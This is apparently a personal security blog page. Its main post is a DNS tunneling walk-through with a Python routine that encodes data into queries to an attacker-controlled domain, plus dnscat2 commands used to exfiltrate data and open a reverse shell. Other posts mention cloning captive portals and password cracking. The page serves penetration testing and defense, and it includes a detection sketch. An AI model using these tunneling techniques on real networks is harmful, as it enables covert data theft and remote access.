Friday, March 30, 2018

Hashcat GPU benchmarks

Tired of incessantly Googling the same benchmarks, I compiled a spreadsheet of Hashcat benchmarks (across various versions) for Nvidia's GTX 9xx and 10xx series of GPUs.

Note that Hashcat versions 3.20 and later are generally much better than previous versions. Some of the benchmarks I found for older cards were for those older versions, and the results might be higher with newer versions of Hashcat.


Tuesday, March 27, 2018

Random thoughts

I've soured on Twitter over time as a platform for thoughts/tweets. This Twitter thread is a good example of how not to present interesting information in article form:

  • Unnecessary background of Twitter user's profile
  • Lede with bigger font
  • Distracting retweets and likes after each 240-character text block
  • Way too much extra stuff for each comment (actual comment text highlighted).


 If you want to have photographs along with itty bitty blurbs of your subject, then use an appropriate format: e.g. EnglishRussia or LiveJournal travelogues.


*******************************

The whole discussion about UBI is useful, but I wonder why the argument that "people will have more time to focus on their passions" is trotted out so frequently (usually without any sources). I think it's fair to say that most people aren't terribly self-propelled and might just vegetate all day in front of the TV or play computer games forever. Of course, new jobs might be developed to help manage the host of issues that crop up when you sit all day, but that's something we'll have to deal with when it happens.


******************************

The Facebook thing going on brings to mind again how easy it is to exploit the vast quantity of information out there for evil, so much so that I'm surprised it doesn't happen more frequently. Perhaps it's because opsec is hard, or because the thinking is easy but the implementation is harder. So many people don't use ad blockers, go through life with low IQ or a lack of the critical-thinking skills needed to identify when they are being duped, or give apps any permissions requested. Non-compliance with the law is not an issue if you don't get caught, and aside from prosecution on an individual scale, lawsuits against companies take so long that predatory practices can continue as long as a ruling hasn't happened.

Once you dispel the notion that a product has to follow all the rules of government regulations, ethics, normal human politeness, etc., then it's very easy to decide to exploit human weaknesses for your own purposes, whether it be marketing, advertising, or whatever (see social engineering and OSINT).

“If you know the personality of the people you’re targeting,
you can nuance your messaging to resonate more effectively
with those key audience groups”
Alexander Nix, Cambridge Analytica
So strictly speaking CA did nothing wrong. Who knew that it would take the election of the wrong person for the media to notice it? CA is the logical conclusion of the ability to weaponize ubiquitous ad networks, coupled with Facebook's targeted advertising, and probably a bit of de-anonymizing as well.

***********************************

With all the reading I'm doing thanks to the plane's holding pattern, I'm getting lots of new thoughts. Currently musing while reading this interesting presentation from Defcon 25 (August 2017) about weaponizing ads and propaganda. If politics, targeted advertising, Facebook, and all the rest are so bad that they wreck your ability to do math (see here, page 14, Discussion section), then why not disengage? You'll only wind up smarter than everyone who engages, and possibly more employable in the near future, when the unholy combination of gig economies, loss of welfare programs, wealth inequality, the long squeeze of climate change, and pending automation via neural networks all combine to make a lot of people unemployable.

Wednesday, March 21, 2018

DNS Tunneling walk-through

DNS is a rather complicated system for resolving human-readable names into IP addresses and vice versa. There are any number of guides online for understanding and implementing DNS, but the average user will only ever see it in the following form:


The reason DNS is actually quite complicated can be figured out from the Wikipedia article linked above, or by looking at the steps involved above. That's a lot of hops and different potential computers to query just to get to google.com. In fact, before step 3 above there can be another step if your computer is in a complicated network, such as at a corporate office location, where a local DNS server is queried first before going out onto the web:
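To make those hops less abstract, here's a minimal sketch (stdlib Python; the function names are my own) of what one of those DNS queries actually looks like on the wire: a 12-byte header followed by the name encoded as length-prefixed labels, then the query type and class.

```python
import struct

def encode_qname(name: str) -> bytes:
    """Encode a hostname into DNS wire format: length-prefixed labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"  # root label terminates the name

def build_query(name: str, qtype: int = 1, txn_id: int = 0x1234) -> bytes:
    """Build a minimal DNS query packet (qtype 1 = A record)."""
    # Header: transaction id, flags (recursion desired), QDCOUNT=1,
    # and zero answer/authority/additional counts.
    header = struct.pack(">HHHHHH", txn_id, 0x0100, 1, 0, 0, 0)
    question = encode_qname(name) + struct.pack(">HH", qtype, 1)  # class IN
    return header + question

pkt = build_query("google.com")
```

Sending `pkt` over UDP to port 53 of any resolver would get back an answer in the same wire format; the tools below do exactly this under the hood.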


Please read the following presentation I found, especially slide 11, which illustrates the arrows in the image above.

It helped me to think of DNS as parts of a system rather than a whole, e.g. it's a "decentralized naming system for computers, services, or other resources connected to the Internet or a private network". To help make the Internet work, various "authoritative" servers have some version of this naming system installed and respond to DNS "queries", translating website names into IP addresses for your web browser to understand. Since it's just a naming system, there are any number of DNS programs, and even your own computer can function as part of it, such as by being a local DNS server.

Here's a query we can walk through from my home network, which isn't a perfect environment, as a recent network/router upgrade plus the use of a secondary DNS server has created some hard-to-diagnose DNS issues. We're going to use the "nslookup" tool to resolve "www.yosefkerzner.com".



Now, because I like to get down to the deep levels of how things work, let's start from the top, or the bottom as it were.

1. The computer issuing the request has received a local IP of 192.168.3.107 from the router via DHCP. DHCP is a way of handing out IP addresses dynamically.


Along with this IP, the router told the computer to use 192.168.3.102 as the local DNS server. This IP address, with the hostname pihole, hosts exactly that: the Pi-Hole network ad blocker. Along with its interesting ad-blocking effects, websites can load faster thanks to some extra caching. So the nslookup tool first outputs just that information.

Then a DNS query is issued to the Pi-Hole:





Next, the pihole refers to the "upstream" DNS settings in its configuration, and finds that the upstream DNS settings have the Google DNS servers of 8.8.8.8 and 8.8.4.4. For some reason two DNS queries for the A record are made (this is strange and I don't know why it happens):



While looking for the A resource record, the Google DNS server discovers a CNAME resource record saying that "www.yosefkerzner.com" is an alias for "yosefkerzner.com", so it re-initiates the query using "yosefkerzner.com".  It finds an A record for "yosefkerzner.com" with the matching IP address of 75.98.175.85, and returns that information to the pihole.
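The CNAME-following behavior described above is easy to sketch. This toy resolver (illustrative Python; the record table is a hypothetical stand-in for what the authoritative server knows) does the same restart-with-the-canonical-name dance:

```python
# Hypothetical record table standing in for the authoritative server's zone.
RECORDS = {
    ("www.yosefkerzner.com", "CNAME"): "yosefkerzner.com",
    ("yosefkerzner.com", "A"): "75.98.175.85",
}

def resolve_a(name: str, max_chain: int = 8) -> str:
    """Follow CNAME records until an A record is found, as a resolver would."""
    for _ in range(max_chain):
        a = RECORDS.get((name, "A"))
        if a:
            return a
        cname = RECORDS.get((name, "CNAME"))
        if cname is None:
            raise LookupError(f"no A or CNAME record for {name}")
        name = cname  # re-initiate the query with the canonical name
    raise LookupError("CNAME chain too long")
```

The `max_chain` cap mirrors what real resolvers do to avoid looping forever on misconfigured CNAME cycles.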

This then gets passed back to the original computer:




I'm not getting into the existing NS records for this domain and what role they play in the resolution process, and also not discussing resolving 75.98.175.85 back to a name (reverse DNS), as this currently isn't working for a reason I'll have to investigate; it probably has to do with the domain being hosted on A2Hosting rather than a standalone server.

Now, after this sidetracking, we can get back to the main topic. If you've read some of the links, you'll have seen that there are a number of resource record types that can be configured for DNS, including the TXT record, which lets you attach arbitrary text to a domain. This can be useful in situations where regular browsing over HTTP isn't working, whether because you have to pay Delta a ton of money to browse on their in-flight wifi, or pay a hotel to use theirs, or because a pesky network administrator has blocked all outbound HTTP communication but isn't monitoring DNS. Why not use the TXT records to hold other types of data and make a data tunnel out of DNS?
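To make the outbound half of that idea concrete, here's a rough sketch (illustrative Python; real tools like dnscat2 layer their own protocol and encoding on top of this) of how data can be smuggled in the query names themselves: hex-encode the payload, split it into labels short enough for DNS's 63-byte label limit, and query them as subdomains of a domain whose authoritative server you control.

```python
import binascii

DOMAIN = "yosefkerzner.com"  # the attacker-controlled domain

def chunk_to_queries(data: bytes, max_label: int = 60) -> list:
    """Hex-encode data and split it into DNS-safe labels under DOMAIN."""
    hexed = binascii.hexlify(data).decode()
    labels = [hexed[i:i + max_label] for i in range(0, len(hexed), max_label)]
    return [f"{label}.{DOMAIN}" for label in labels]

def reassemble(queries) -> bytes:
    """Server side: strip the domain suffix and decode the hex payload."""
    hexed = "".join(q[: -(len(DOMAIN) + 1)] for q in queries)
    return binascii.unhexlify(hexed)
```

The client resolves each of these names in order; every query necessarily arrives at your authoritative server, which logs the labels and reassembles the payload. Responses (e.g. in TXT records) carry data back the other way.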

Enter DNS tunneling. Guides are available everywhere, here's the best image I've found:


Some colleagues and I used DNS tunneling to prove it was possible to send data outbound from a locked-down Windows 10 machine, meant for a secure environment, to a server under my control. I mostly followed this guide: https://zeltser.com/c2-dns-tunneling/, but used dnscat2-powershell, a PowerShell rewrite of the DnsCat2 client created by the folks at BlackHillsInfosec, as the original client executable was flagged by antivirus and immediately removed.

The domain I used was "yosefkerzner.com", and in A2Hosting the settings were set as follows:
  1. Visit https://my.a2hosting.com/clientarea.php?action=domaindetails
  2. Click the entry that says "Private Nameservers". Register a NameServer Name. In my case it was dns1.yosefkerzner.com. Enter the IP address of the droplet created during the guide above, and click "Save Changes". Create another one for dns2.
  3. Now, click the section titled "Nameservers". Click "Use Custom Nameservers" and enter your private nameservers, e.g. dns1.yosefkerzner.com and dns2.yosefkerzner.com.
  4. Click "Change Nameservers" and wait 24-48 hours as the nameserver information propagates across the web. Watch whatever content was originally hosted on your domain disappear.

 I encountered the following issues with Dnscat2:
  • The tunnel created was highly unstable.
    • It did not tolerate being idle: eventually DNS queries would get jumbled up and the tunnel would break, so I took to launching long-running commands, such as a dump of running processes, to keep the tunnel alive while researching what else could be exfiltrated.
    • I was forced to launch a connection first and only then drop into a reverse shell. Command shells didn't work at all, though console connections did if I wanted to type text on the client and see it on the server.
    • The tool's built-in security options also caused instability, so I had to operate it without encryption or secret passphrases, e.g.:
      • On the server: ruby ./dnscat2.rb --security=open --no-cache --dns="domain=yosefkerzner.com"
      • On the client: Start-Dnscat2 -Domain yosefkerzner.com -NoEncryption
  • Uploading and downloading didn't work at all, even for small files.

All in all it was a fun experience and a great proof of concept of the importance of security controls for DNS. To prevent DNS tunneling, consider restricting outbound DNS to approved resolvers and monitoring for large DNS volumes, because no legitimate client needs to be sending vast quantities of DNS queries to an unknown IP address.
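As a sketch of what that monitoring could look like (illustrative Python; the thresholds are made up and would need tuning against real traffic), a detector can combine per-client query volume with the entropy of the first label, since hex- or base32-encoded payloads look far more random than normal hostnames:

```python
import math
from collections import Counter

def label_entropy(name: str) -> float:
    """Shannon entropy of the first label; encoded payloads score high."""
    label = name.split(".")[0]
    counts = Counter(label)
    total = len(label)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def flag_clients(query_log, volume_threshold=500, entropy_threshold=3.5):
    """query_log: iterable of (client_ip, queried_name) pairs.

    Flags clients that are both noisy and querying random-looking names.
    """
    log = list(query_log)
    volumes = Counter(ip for ip, _ in log)
    suspicious = set()
    for ip, name in log:
        if volumes[ip] > volume_threshold and label_entropy(name) > entropy_threshold:
            suspicious.add(ip)
    return suspicious
```

Fed from Pi-Hole or resolver query logs, this would have lit up the dnscat2 session above immediately: thousands of long, high-entropy subdomain queries from one host in a short window.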

Tuesday, March 20, 2018

Reading fun stuff

Thanks to a stroke of luck, I'm in another city in a holding pattern, waiting on a client to give me (us) work to do. In the meantime there's stuff to read and news inputs to improve, e.g. TweetDeck: now it's all pretty and Twitter is usable for information again.

https://arxiv.org/pdf/1803.03453v1.pdf - my favorite video from this paper is the following: Evolving Soft Robots with Multiple Materials

I was also sent this article about Getting up to Speed with Ethereum, and indeed it's quite the crash course. Currently I'm bogged down in the Ethereum DNS-equivalent proposal and envisioning alternate browsers. Oh wait, there already is one, kinda, called Mist.

After the Ethereum crash course I plan to read through the resources on this Technet article about Active Directory and only then start creating an Active Directory lab.

With all this spare time, I'm also making improvements to music-downloading scripts and other random stuff. For instance, yesterday afternoon was spent in a frustrating attempt to get the Pineapple Nano "Portal Auth" and "Captive Portal" modules to work, but no matter what I do, cloning websites just doesn't work. The Nano's native ash shell doesn't help either. I'll keep at it, but at some point it will be easier to just run my own web server with a copy of the login portal and overpower nearby broadcast APs with my signal.

In other news, I'd installed a new Graylog VM to take Nzyme inputs on a system with more resources. It worked fine for a few days while connected to the homelab, but apparently over VPN it can't take the same input... which makes sense given that it's got the NAT'ed address. What's worse, even on NAT the web interface fails to load fully, all while CPU usage is completely maxed. So that's another thing to hunt down, because I'd like to gather 10-20 GB worth of data to mess with at some other time.

Friday, March 16, 2018

Projects Update

I think I'll start posting these sorts of updates regularly, not least as a way of keeping track for myself (brain dump hehe).

Ever since Italy, and even before that, I've been in a bit of a funk: still interested in infosec but wishing for something else. This probably isn't related to work; it might be due to a stagnation of new ideas/areas. Maybe it would make sense to study at coffee places (can't say coffeeshop after Amsterdam), in more social environments.

Anyway, here's a list of pending projects:

  • Still need to set up Active Directory
  • Still need to set up the wireless lab environment for the Defcon Enterprise Wifi hacking lab
  • Still need to set up the Raspberry Pi to stream ragas
  • Streamline password-cracking process using a new GTX 970 combined with WakeOnLan
    • This will include hashcat wordlists plus rules
  • Read all the books, and especially Network+ for more ideas
  • Sit down and think of the best form factor for an always-on VM machine. As much as the current machine (which is a trash save, having previously been one of my dad's PCs) works, it's still 9 years old: dual core, max 8 GB of DDR2 non-ECC RAM, with a 160 GB spinny, and, as I discovered yesterday, it simply can't handle newer operating systems such as an always-available Kali Linux system. Intel NUCs look nice, though I'd like the lowest operating noise level possible. Maybe I'll upgrade the current box instead.
  • Try implementing an SSO solution for the homelab. With just a few certificates for VPN I can already foresee certificate management being a nightmare, let alone implementing SSH certificates everywhere. 
  • Try implementing a vulnerability management program. For some reason, identical versions of Raspbian can have different outdated versions of Apache even when fully upgraded - so how are these prioritized?
  • Try again to get ICMP ping to work within the LAN.
  • Track down pesky Plex issues. 

I'll post more items later.